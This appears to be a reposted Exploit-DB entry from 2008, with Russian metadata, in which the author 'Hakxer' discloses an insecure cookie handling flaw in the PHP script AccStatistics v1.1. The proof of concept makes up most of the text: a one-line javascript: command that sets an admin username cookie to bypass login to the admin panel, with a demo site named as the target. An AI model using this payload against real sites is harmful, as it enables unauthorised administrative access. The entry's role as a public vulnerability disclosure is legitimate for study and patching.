- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6965
- Проверка EDB
-
- Пройдено
- Автор
- HAKXER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6294 cve-2008-6293 cve-2008-6292
- Дата публикации
- 2008-11-03
Код:
###########################################################################
______ __ __ ______ __ ______
/ ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___
/ __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \
/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / /
/_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/
/____/
# [~] Discovered by : Hakxer
# [~] Type Gap : AccStatistics v1.1 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/accstatistics.html
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################
Bug In : /admin/Index.php
PoC : javascript:document.cookie="username_cookie=admin";
[~] Admin panel
http://www.accstatistics.com/demo/index.php
[~] Execute JS Code javascript:document.cookie="username_cookie=admin";
[~] Refresh
# Proud To be a Muslim #
#_=END=_#
# milw0rm.com [2008-11-03]- Источник
- www.exploit-db.com
